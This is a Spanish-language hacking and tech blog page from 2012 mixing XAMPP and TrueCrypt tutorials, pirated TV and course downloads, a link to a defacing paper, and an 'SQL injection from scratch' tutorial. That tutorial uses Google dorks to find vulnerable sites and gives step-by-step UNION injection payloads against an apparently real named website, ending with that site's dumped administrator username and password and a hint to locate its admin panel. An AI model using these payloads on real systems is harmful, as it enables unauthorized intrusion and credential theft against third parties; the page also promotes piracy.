[H]ACKMUNDY - [L]ABS

Bienvenidos a [H]ACKMUNDY - [L]ABS....

Backtrack

Aprende Conceptos Basicos de Backtrack...

Informatica

Blog dedicado para Aprende y entender la Informatica......

Programacion

Aprende Nociones Basicas para iniciarte en la programacion...

Personalizacion

Aprende a Personalizar tu PC, blog........

lunes, 31 de diciembre de 2012

Instalación de XAMPP en Linux Mint

XAMPP es un paquete de aplicaciones (Apache, MySQL y FTP) diseñado para el desarrollo de proyectos web, es de código libre y de fácil configuración para el usuario.

XAMPP

En esta entrada describiré los pasos que seguí para instalarlo en la distro Linux Mint 12, que por cierto está muy atractiva, empezemos:

1. Descargar el paquete XAMPP desde este enlace: xampp-linux-1.7.7.tar.gz (última versión)

2. Una vez descargado, descomprimir desde una Terminal:
sudo tar xvfz xampp-linux-1.7.4.tar.gz -C /opt
Hasta aquí todo bien, se creará la carpeta "lampp" en la carpeta "opt" del sistema, dentro de "lampp" se encuentra la carpeta "htdocs" que es donde se guardarán los archivos de nuestra página web local; entonces para poder modificar esos archivos debemos darle permisos a esa carpeta:

3. Desde Terminal, dar permisos para que todos los usuarios puedan escribir en la carpeta (a: todos; +: autorizar; w: escritura)
 sudo chmod a+w /opt/lampp/htdocs
4. Para más comodidad podemos crear un enlace simbólico que nos lleve a "htdocs" en nuestra carpeta personal (ln: link; -s: simbólico)
sudo ln -s /opt/lampp/htdocs /home/usuario/web
(bastante obvio pero igual, cambiar 'usuario' por el tuyo)

5. Ya va quedando, para  manejar XAMPP usaremos esta línea:
sudo /opt/lampp/lampp OPCION
donde OPCION puede ser:  start, restart o stop (Iniciar, reiniciar y detener).
Dicho esto iniciamos;
sudo /opt/lampp/lampp start
Si todo ha salido bien el comando responderá algo como:
Starting XAMPP for Linux 1.7.7...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Starting MySQL...
XAMPP: Starting ProFTPD...
XAMPP for Linux started.

Y... listo! Ya tenemos estas útiles herramientas a disposición.

viernes, 21 de diciembre de 2012

Paper de Defacing

Hola hoy les traigo un paper que lo iso Okol esta super se los recomiendo.
Se trata de defacing (Basico).
Incluye los temas:


Rfi (REMOTE FILE INCLUSION)
Lfi ( LOCAL FILE INCLUSION)      
Xss (CrosS Site Scripting)

Symlink con la tool (EN PHP )


Autor: Okol

                                                  Descarga!

martes, 18 de diciembre de 2012

The Walking Dead Temporada 3 Español

The Walking Dead [Temp.3]

 Hola esta ves le traigo la tercera parte lamentablemente solo esta en español no hay aun en latimo pero apenas salga lo pongo.

The Walking Dead Temporada 1
The Walking Dead Temporada 2


SINOPSIS: Serie cuyo piloto estará dirigido y escrito por Frank Darabont. Basada en un cómic homónimo, éste narra la historia de un grupo de supervivientes durante un apocalipsis zombie. Este grupo gira en torno a Rick Grimes, un policía que estuvo en estado comatoso durante la irrupción de la plaga. Aunque el leit motiv sea este apocalipsis zombie, la serie se centra más en las relaciones entre los personajes, su evolución y comportamiento en las situaciones críticas.
Reparto: Andrew Lincoln, Jon Bernthal, Jeffrey DeMunn, IronE Singleton, Sarah Wayne Callies, Laurie Holden, Chandler Riggs, Steven Yeun, Michael Rooker, Emma Bell

Enlaces Torrent

  1. Seed
  2. Sick
  3. Walk With Me
  4. Killer Within
  5. Say the Word
  6. Hounded
  7. When the Dead Come Knocking
  8. Made to Suffer 
  9. Enlaces Descarga Directa
  1. Seed
  2. Sick
  3. Walk With Me
  4. Killer Within
  5. Say the Word
  6. Hounded
  7. When the Dead Come Knocking
  8. Made to Suffer

    Ingles sin Barreras [Completo] [DVDrip] [Cuadernos-Libros-Caratulas]




    Nombre: Ingles sin Barreras
    Tipo: Curso de Ingles en Video
    Formato: AVI
    Calidad: DVDrip
    Peso: 680 MB aprox. por DVD (12 DVDs)
    Audio: esp. latino e ingles

    Manuales, cuadernos y caratulas Incluidas
    Ingles sin Barreras es el metodo de ingles con mas exito en los  Estados Unidos. Desde su creacion en 1988, miles de personas de habla  hispana lo han utilizado y han conseguido dominar el ingles.
    Ingles sin Barreras se centra en las necesidades especificas de las  personas de habla hispana que residen en los Estados Unidos. La  ortografia, pronunciacion y acentos que se muestran en este metodo son  los que se usan en los Estados Unidos.
    Con Ingles sin Barreras, podra aprender ingles comodamente en su hogar, sin tener que ir jamas a una sala de clases.
    No tendra que memorizar aburridas reglas gramaticales; Ingles sin  Barreras le presenta situaciones de la vida real. Por lo tanto, se  familiarizara palabras y frases que podra utilizar inmediatamente.


     

    Importante:
     Clikea El Enlace Obligatorio O Copialo Y Pegalo En tu Navegador
     No Funciona En Gestores Ya Que Es Una Carpeta Saludos


    Saludos...

    sábado, 15 de diciembre de 2012

    TrueCrypt en Windows

    En esta entrega recorreremos los primeros pasos para obtener, instalar y comenzar a utilizar TrueCrypt en Windows  XP, 7 o Vista.

    Si deseas instalarlo en Linux mira este topic
    So deseas manejarlo crear volumenens en Linux mira este Topic

    Instalación y configuración

    En primer lugar, descargaremos la última versión disponible de TrueCrypt para Windows. Es un fichero comprimido con zip de aproximadamente 1.5 MB, que contiene también la Guía de Usuario (un pdf de más de 90 páginas, en inglés).

    Lo descomprimimos todo en una carpeta temporal y ejecutamos TrueCrypt Setup.exe:

    Instalar TC en Windows 1
    Pulsa Install para instalar el programa:
    Instalar TC en Windows 2
    En pocos segundos el programa queda instalado. Pulsa OK. Se te pregunta ahora si quieres abrir la vesión en línea del tutorial en tu navegador web. Contesta que no (para eso tienes este tutorial en español) y pulsa Exit (Salir).
    Arranca TrueCrypt (desde el menú de Inicio o el icono correspondiente el escritorio):
    Iniciando TC
    Antes de nada, vamos a "traducir" TrueCrypt al español. Pulsa Settings -> Language -> Download Language Pack:
    Castellanizando TC 1
    Se arranca tu navegador web para que descargues el fichero de idioma español. Descarga el zip y descomprímelo en la misma carpeta donde instalaste TrueCrypt. Reinicia TrueCrypt. De nuevo Settings -> Language -> Español:
    Castellanizando TC 2
    Mucho mejor, ¿no? Ahora ya podemos meternos en harina. Pulsemos "Crear Volumen":
    Creando volumen 1
    Lee las instrucciones de la ventana anterior y pulsa Siguiente:
    Creando volumen 2
    Como ves, aquí podríamos elegir crear nuestro volumen TrueCrypt en una partición o un dispositivo USB, pero de momento elegiremos crearlo dentro de un fichero, para el que hay que elegir ahora nombre y localización. Pulsa "Seleccionar Archivo" y en la carpeta "Mis Documentos" escribe "Mi Volumen" como nombre de fichero. Cuando acabes pulsa "Siguiente".
    Llegamos a una pantalla que alguien, sin duda en un descuido, tradujo como "Opciones de Encripción" (sí, entenderé que vuelvas a seleccionar "English" como idioma de la aplicación ;):
    Creando volumen 2
    Vamos avanzando. Hemos llegado al momento de elegir algoritmos (de hash y de cifrado). ¿Cuál elegir? Pues si no tienes ninguna preferencia al respecto, puedes limitarte a elegir los que te ofrecen por defecto. Si no, una opción que puede ayudarte a decidir (o al menos a elegir el más rápido) es "Comparación". Mira qué curioso:
    Probando algoritmos
    Pulsa "Siguiente" para elegir el tamaño de tu volumen cifrado (observa cuáles son los límites, según tu sistema de archivos). Para este tutorial me conformaré con 3 megabytes:
    Dando tamaño
    Momento (decisivo, porque éste puede ser el punto más débil de tu cadena de seguridad) de elegir contraseña. Larga y con caracteres variados, siempre que no la olvides o la pierdas:
    Dando formato
    Selecciona el sistema de ficheros que prefieres y mueve el ratón lo más posible durante al menos 30 segundos, para aumentar la aleatoriedad de tu clave. A continuación pulsa "Format":
    Volumen creado 1
    Volumen creado 2
    No ha sido nada complicado, ¿verdad?. Pulsa OK y Salir.

    Utilización

    No podremos utilizar nuestro nuevo volumen cifrado mientras no lo montemos (el concepto de "montar unidades" antes de poder utilizarlas posiblemente resulte más conocido para aquellos lectores que tengan experiencia en ssitemas Linux).
    Volvemos a la ventana de TrueCrypt (que ha permanecido abierta en segundo plano durante todas nuestras operaciones anteriores). Elegiremos una letra de unidad (la K de Kripto, por ejemplo) y luego "Seleccionar archivo":
    Montando volumen 1
    Navegaremos hasta la carpeta donde creamos el fichero "Mi Volumen" en el apartado anterior, y seleccionaremos ese fichero. Al pulsar "Montar" se nos pedirá nuestra contraseña:
    Montando volumen 2
    Éxito:
    Montando volumen 3
    Si ahora hacemos doble clic sobre nuestra unidad K, veremos que se comporta como cualquier otra unidad de disco:
    Montando volumen 4
    La diferencia es que cualquier fichero que arrastres hacia ella se guardará cifrado de forma transparente, y sin necesidad de que teclees de nuevo tu contraseña (la contraseña sólo se te pide cuando montas la unidad). De hecho, y a efectos prácticos, puedes utilizar tu volumen cifrado TrueCrypt como cualquier otra unidad de disco. Los ficheros se cifran y descifran en memoria, sin que nada se escriba "en claro" en el disco duro en ningún momento. De hecho, si se fuera la corriente y se apagara el ordenador, ningún dato en claro podría ser accedido, ya que tras reiniciar tendrías que suministrar de nuevo tu contraseña para poder montar el volumen. Lógicamente, también puedes desmontar tú mismo el volumen para lograr el mismo efecto (botón "Desmontar").

    SQL Injection desde cero

    Introducción:

    Hola a todos, En este tutorial les enseñare SQLi desde cero.
    Al ser un tutorial con fines educativos y no destructivos. Solamente veremos cómo obtener el usuario y contraseña de administrador. El resto corre por cuenta de cada uno lo que quiera hacer con el acceso…
    Se comenzara buscando una web cualquiera en google, buscaremos un lugar en la web para inyectar, haremos la inyección y obtendremos los datos de acceso. Pero antes comenzaremos con un poco de teoria.

    SQL

    Es un lenguaje normalizado, estructurado de consultas a bases de datos. Esto quiere decir, que en casi todas las consultas a distintos tipos de bases de datos, se usan las mismas sentencias.
    SQL, cuenta con dos comandos, que son los DLL (permiten crear y definir bases de datos, campos e índices) y por otro lado los comandos DML (permiten generar consultas, filtrar y extraer datos de la base de datos).
    Nos centraremos en ese último, ya que SQLi, consiste en generar consultas a la base de datos para que nos devuelva datos de interés.
    Los comandos DML son:

    Delete: Permite eliminar registros de la base de datos.
    Update: Modifica valores de campos previamente creados.
    Select: Sirve para consultas registros en la base de datos.
    Insert: Carga lotes de datos en una base de datos.

    Clausulas

    Las clausulas son condiciones de modificación. Y se emplean para definir datos o manipularlos.
    Entre las clausulas tenemos:

    Order By: Ordena registros seleccionados
    Group by: separa registros
    Having: expresa una condición que debe satisfacer cada grupo
    From: Sirve para especificar una tabla de la cual se quieren obtener registros
    Where: Sirve para las condiciones que debe reunir un registro para ser seleccionado

    Operadores Logicos

    Los operadores lógicos o conectivos lógicos se utilizan para conectar dos formulas para que el valor de verdad. Siempre darán un valor de verdad verdadero o falso y se leen de izquierda a derecha.
    Los operadores lógicos usados son:

    Or: Evalua dos condiciones, devolviendo un valor de verdad verdadero si alguna de las dos es verdadera
    And: Evalua dos condiciones y devuelve un valor de verdad verdadero, si ambas condiciones son iguales.
    Not: Devuelve un valor contrario a la expresión. Si la expresión es True, devolverá False y viceversa

    Operadores de comparación:


    Los operadores de comparación, son utilizados para comparar dos valores o formulas.
    Los operadores son:

    < Menor que > Mayor que
    <> Distinto que
    >= Mayor o igual que
    <= Menor o igual que
    Between: especifica un intervalo de valores
    Like: Compara un modelo
    In: Especifica registros en una base de datos

    Funciones de agregado

    Estas formulas se utilizan dentro de la clausula Select en grupos de registros para devolver un único valor que se aplica en un grupo de registros.

    Max: devuelve el valor más grande de un campo específico
    Min: Devuelve el valor más chico de un campo especifico.
    Sum: Se utiliza para devolver la suma de todos valores de un campo específico
    Avg: calcula el promedio de un campo específico Count: Devuelve el numero de registros de la selección Limit: devuelve un rango de resultados deseados en lugar de todos los que puede devolver dicha consulta.

    Otras consultas

    Veremos a continuación otras consultas que se suelen utilizar en las inyecciones SQL.

    Union: Sirve para combinar el resultado de dos consultas juntas.
    Information_schema.tables: Devuelve información de una tabla determinada
    Information_schema.columns: Devuelve información de una columna determinada
    Concat: Concatena los resultados de varios campos diferentes
    Group_concat: devuelve como resultado una cadena de concatenación de un grupo de valores no nulos Char: se utiliza para insertar caracteres de control en cadenas de caracteres. 

    SQLi

    Este tipo de ataque consiste en inyectar código SQL en una sentencia SQL ya programada, con el fin de alterar el funcionamiento de la base de datos.
    Lo que haremos a lo largo de este tutorial, será inyectar código SQL a una web, con el fin de ocasionarle errores a la base de datos para que nos devuelva datos que usaremos en nuestra inyección y finalmente obtener los datos de acceso al panel de administración.

    Dorks:

    Los Dorks son palabras claves que usaremos para encontrar sitios vulnerables.
    Un ejemplo de dork seria el siguiente: noticia.php?id=
    En google deberíamos poner lo siguiente: inurl: noticia.php?id=
    Esto nos arrojara muchos resultados de sitios que quizás ya no sean vulnerables. Pero es por eso que debemos ir alternando Dorks, hasta que logremos dar con una.
    El método para generar dorks seria cambiar el noticia por otro nombre, por ejemplo news, view, photo, etc. Y el resto quedaría igual.
    Otra de las cosas a tener en cuenta, es que después de realizar la búsqueda, ir a las páginas del final que son las que más desactualizadas están y probablemente sean vulnerables.
    Veremos a continuación un ejemplo:


    Coloco el Dork en google y comienzo a navegar, buscando webs que puedan llegar a ser vulnerables. Yo encontré esta:

    Como se puede ver, ahí en la url aparece el dork que coloque en google

    Pero… ¿cómo me doy cuenta si es o no vulnerable?

    Acá empieza la parte entretenida. Lo que debemos hacer es borrar lo que esta después de id= y provocar un error en la base de datos.

    ¿Y de qué forma podemos provocar un error?

    Fácil… colocando caracteres no permitidos, por ejemplo una comilla, un numero negativo, etc. Colocare un -1 (uno negativo) y veremos cómo se comporta la web

    Pagina original:

    Pagina con el -1:

    Se puede notar que no han cargado elementos dentro del cuerpo de la página, esto da señal a que puede ser vulnerable.
    Ahora probemos colocando una comilla:

    Nos tira un error de la base de datos:

    1
    2
    3
    Fatal error: Call to a member function RecordCount()
    on a non-object in /home/samg/public_html/include/objetos/Noticia.class.php
    on line 333
    Con esto podemos ver que pudimos generar un error en la consulta a la base de datos.

    SQL Injection

    Ahora probaremos si realmente es vulnerable o no a SQLi. Para ello, después del id= colocaremos lo siguiente:

    1
    -1+UNION+SELECT+1,2--
     Y en mi caso, en el cuerpo de la página, me sale el mismo Fatal error que cuando ingrese la comilla simple.
    Lo que debemos hacer ahora, es comenzar a añadir números, hasta que ese error desaparezca.

    La inyección seria así:

    1
    2
    3
    -1+UNION+SELECT+1,2,3--
    -1+UNION+SELECT+1,2,3,4--
    -1+UNION+SELECT+1,2,3,4,5--
    Y asi sucesivamente hasta que el error desaparezca. En mi caso quedo hasta el numero 12, pero hay ocasiones en las que puede superar los 60!

    Cuando el error ya no este, nos volverá a mostrar la pagina, y curiosamente contiene uno o mas  números en el cuerpo de la web

    Ese 5 y ese 2, son números de tablas, la web es vulnerable a SQLi. En este caso debo elegir uno de los dos números, yo seleccionare el 5 por que es el mas vistoso, pero en definitiva se puede usar cualquiera.
    Usare a ese 5 para que me muestre los nombres de las tablas en su lugar.
    Lo que sigue ahora es agregar después del último número de la url el siguiente código:

    1
    +from+information_schema.tables--
    Quedaría en mi caso, así:

     Y reemplazar el número 5 (que fue el numero que nos apareció en el cuerpo de la pagina) por table_name

     Una vez hecho esto, presionamos enter y veremos que en el cuerpo del mensaje nuestro numero desapareció y apareció el nombre de una tabla en su lugar.

    Lo que debemos hacer ahora, es agregar después de information_schema.tables lo siguiente:

    1
    +limit+2,1--

    Quedaría algo así:

    Y si miramos el cuerpo del mensaje, el nombre de la tabla, cambió

    Lo que sigue, es ir sumándole +1 al limit para que valla de forma creciente, hasta encontrar una tabla que pueda contener los datos del administrador de la página
    El limit debería ir de la siguiente forma:

    1
    2
    3
    4
    +limit+2,1--
    +limit+3,1--
    +limit+4,1--
    +limit+5,1--

    Y así sucesivamente hasta hallar una tabla importante. En mi caso llegue hasta la 38 y encontré la de administradores.


    Lo que sigue, es convertir ese nombre a ASCII. Asique buscaremos en google algún conversor de string a ascii.

    El resultado de samg_administradores es el siguiente:

    1
    115 97 109 103 95 97 100 109 105 110 105 115 116 114 97 100 111 114 101 115
    Ahora sacaremos los espacios que hay entre los números y colocaremos comas entre los valores:

    1
    115,97,109,103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115
    Guardaremos esa cadena de números para usarla luego en nuestra inyección.
    Ahora volvemos a nuestra inyección y cambiaremos table_name por group_concat(column_name) y information_schema.tables por

    1
    2
    information_schema.columns+where+table_name=char(115,97,109,103,95,97,100,109,105,11
    0,105,115,116,114,97,100,111,114,101,115)--
    y quitamos el +limit+ con sus valores numéricos.

    Debería quedar así:

    1
    2
    3
    http://www.samg.es/web/noticias/noticia.php?id=-1+UNION+SELECT+1,2,3,4,group_concat(column_name)
    ,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=char(115,97,109,
    103,95,97,100,109,105,110,105,115,116,114,97,100,111,114,101,115)--
    Si observamos, el cuerpo de la página, veremos la composición de las columnas de la tabla

    Las que me sirven en mi caso son las columnas de Login y Password, asique ahora reemplazaremos en la inyección lo siguiente:

    1
    group_concat(column_name) por concat(Login,0x3a,Password)

    Concat significa concatenar, algo similar que unir. Y el 0x3a, son dos puntos. Esto es para que el usuario y la contraseña no aparezcan juntas, sino que los separe los dos puntos. Teniendo un resultado algo así:

    Usuario:Contraseña

    Y borraremos desde information_schema.columns en adelante y dejaremos solamente el +from+
    Y luego de ese from, colocamos el nombre de la tabla, que en mi caso se llamaba: samg_administradores
    Quedándome lo siguiente:


    Y en el cuerpo de la página, podremos ver los datos del administrador:


    1
    2
    Usuario: samg
    Contraseña: samg06
    En caso de querer hackear la web, solo resta encontrar el panel de admin con algún admin finder. Pero como dije al principio del tutorial, este paper es con fines educativos.

    Espero que les haya gustado y que les sea útil.
    Saludos.
    Esto fue extraido del foro de ANTRAX

    sábado, 8 de diciembre de 2012

    Cómo proteger tu información en Linux con Truecrypt

    Truecrypt permite encriptar un disco virtual, una partición o el disco completo de un dispositivo de almacenamiento. Lo más interesante de Truecrypt consiste en la encriptación instantánea de los datos y la posibilidad de configurarlo fácilmente.

    Probablemente te preguntes: ¿para qué necesito algo como Truecrypt? Bueno, sin caer en conspiranoias, el tema de la seguridad es muy sensible y algunas veces es necesario tomar algunas medidas de seguridad adicionales de modo de no comprometer nuestra información.

    Truecrypt funciona del siguiente modo: montás el dispositivo virtual a través de Truecrypt y luego podés acceder a él como a cualquier otra carpeta de tu sistema. Obviamente, para poder montar el dispositivo es necesario ingresar una contraseña. Una vez que terminás de trabajar, desmontás el dispositivo y listo.

    Veamos cómo configurar Truecrypt en caso de que queramos encriptar una carpeta de nuestro disco rígido.

    Paso 1

    Descargá Truecrypt desde www.truecrypt.org. Descomprimilo y ejecutalo con el siguiente comando:

    ./truecrypt-7.0a-setup-x64

    Esto es en el caso de una máquina 64bit y para la versión 7.0a. Si usás Linux 32bit, instalalo como corresponde.

    Paso 2

    Al ejecutar Truecrypt, vas a ver la siguiente ventana.
    truecrypt ubuntu 2.png


    Hacé clic en el botón Create Volume.

    Paso 3

    truecrypt ubuntu 3.png


    Una vez que se abre la nueva ventana, elegí la primera opción y hacé clic en Next. En caso de que quieras encriptar TODO el disco, elegí la segunda opción y hacé clic en Next.

    Paso 4

    truecrypt ubuntu 4.png

    En esta ventana las opciones están bien explicadas. Generalmente, la primera opción suele ser la mejor. Clic en Next.

    Paso 5

    truecrypt ubuntu 5.png

    Aquí, tenés que elegir la ruta donde se guardará el archivo de Truecrypt. Dale un nombre y presioná el botón Save. Ojo, esta no es la ruta de la carpeta que se va a encriptar.

    truecrypt ubuntu 6.png


    Clic en Next.

    Paso 6

    truecrypt ubuntu 7.png

    Lo ideal es dejar la configuración predeterminada y que Truecrypt utilice el algoritmo de encriptación AES. Para más información sobre los diferentes algoritmos de encriptación, podés acceder a la página de Truecrypt. Clic en Next.

    Paso 7

    truecrypt ubuntu 8.png

    En este paso hay que decirle a Truecrypt qué tan grande va a ser la carpeta encriptada. Esto, obviamente, depende de las necesidades de cada uno. Clic en Next.

    Paso 8

    truecrypt ubuntu 9.png

    Escribí la contraseña que querés utilizar. Lo mejor es escribir una que contenga dígitos y letras. Cuanto más larga, mejor. Un dato importante: no te olvides la contraseña porque no hay manera de recuperarla.

    Paso 9

    truecrypt ubuntu 10.png

    Aquí le indicamos a TrueCrypt con qué sistema de archivos deberá crearse el disco virtual encriptado. Las opciones son FAT, Ext2, Ext3 y Ext4. En caso de que desees poder utilizar esta carpeta en Windows, deberás elegir FAT.

    Paso 10


    Por más bizarro que parezca, lo que hay que hacer en este paso es mover el cursor del mouse como loco. Eso ayudará a mejorar la calidad de la encriptación. Este paso es sumamente importante así que dedicale el tiempo que sea necesario. Clic en el botón Format.

    Te va a pedir tu contraseña de administrador. Ingresala para que pueda crearse el disco virtual.
    truecrypt ubuntu 12.png
    truecrypt ubuntu 13.png


    Paso 11

    truecrypt ubuntu 14.png

    Una vez terminado, hacé clic en Select File y buscá el archivo creado en el paso 5. Truecrypt te preguntará por tu contraseña. Ingresala y automáticamente se agregará el disco virtual.

    Hacé clic derecho sobre el disco recientemente creado y seleccioná la opción Open. El resto es sabido: empezá a copiar toda la información que quieras proteger en ese disco virtual. Truecrypt se encargará de encriptarla en tiempo real y súper rápido.

    Saludos....

    Web hosting